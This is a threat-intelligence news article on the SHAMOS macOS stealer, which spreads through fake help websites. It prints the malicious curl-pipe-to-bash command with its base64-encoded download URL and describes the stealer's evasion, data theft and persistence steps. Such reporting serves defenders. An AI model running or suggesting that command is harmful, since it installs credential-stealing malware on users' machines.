New SHAMOS Malware Attacking macOS Via Fake Help Websites to Steal Login Credentials

A sophisticated malware campaign targeting macOS users has emerged between June and August 2025, successfully attempting to compromise over 300 customer environments through deceptive help websites.

The malicious operation deploys SHAMOS, a variant of the notorious Atomic macOS Stealer (AMOS), developed by the cybercriminal group COOKIE SPIDER who operates this information stealer as malware-as-a-service for rent to other cybercriminals.

The attack begins when unsuspecting users search for common macOS troubleshooting solutions, such as “macos flush resolver cache,” only to encounter promoted malvertising websites in their search results.

These fraudulent sites, including mac-safer.com and rescue-mac.com, masquerade as legitimate technical support resources while harboring malicious intent.

The campaign has targeted users across multiple countries including the United States, United Kingdom, Japan, China, Colombia, Canada, Mexico, and Italy, notably excluding Russia due to restrictions within Russian eCrime forums that prohibit targeting Commonwealth of Independent States regions.

CrowdStrike researchers identified that the threat actors exploit a sophisticated social engineering approach by presenting victims with seemingly helpful instructions for resolving their technical issues.

However, these instructions contain a critical deception: victims are instructed to execute a malicious one-line terminal command that initiates the malware installation process.

The researchers noted that one Google Advertising profile promoting these spoofed websites appears to impersonate a legitimate Australia-based electronics store, suggesting advanced identity spoofing techniques.

Infection Mechanism and Technical Implementation

The malware’s infection mechanism relies on a cleverly disguised terminal command that victims unknowingly execute:-

"curl -fsSL" $ ("echo" "aHR0cHM6Ly9pY2xvdWRzZXJ2ZXJzLmNvbS9nbS9pbnN0YWxsLnNo" | "base64 -d") | "bash"

This command performs several critical operations in sequence. First, it decodes the Base64-encoded string to reveal the URL https://icloudservers.com/gm/install[.]sh, then downloads and executes a Bash script from this malicious server.

The script captures the user’s password and subsequently downloads the SHAMOS Mach-O executable from https://icloudservers.com/gm/update.

Once installed in the /tmp/ directory, SHAMOS employs multiple evasion techniques to avoid detection.

The malware removes extended file attributes using xattr commands to bypass macOS Gatekeeper security checks, assigns executable permissions through chmod, and conducts anti-virtual machine checks to ensure it is not operating within a security sandbox environment.

The stealer then executes various AppleScript commands for comprehensive host reconnaissance and data collection.

SHAMOS specifically targets cryptocurrency wallet files, sensitive credential databases, Keychain data, AppleNotes content, and browser-stored information.

The malware packages stolen data into a ZIP archive named “out.zip” and exfiltrates it using curl commands to remote servers.

Additionally, SHAMOS establishes persistence through a Plist file named com[.]finder[.]helper[.]plist saved to the User’s LaunchDaemons directory when sudo privileges are available.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.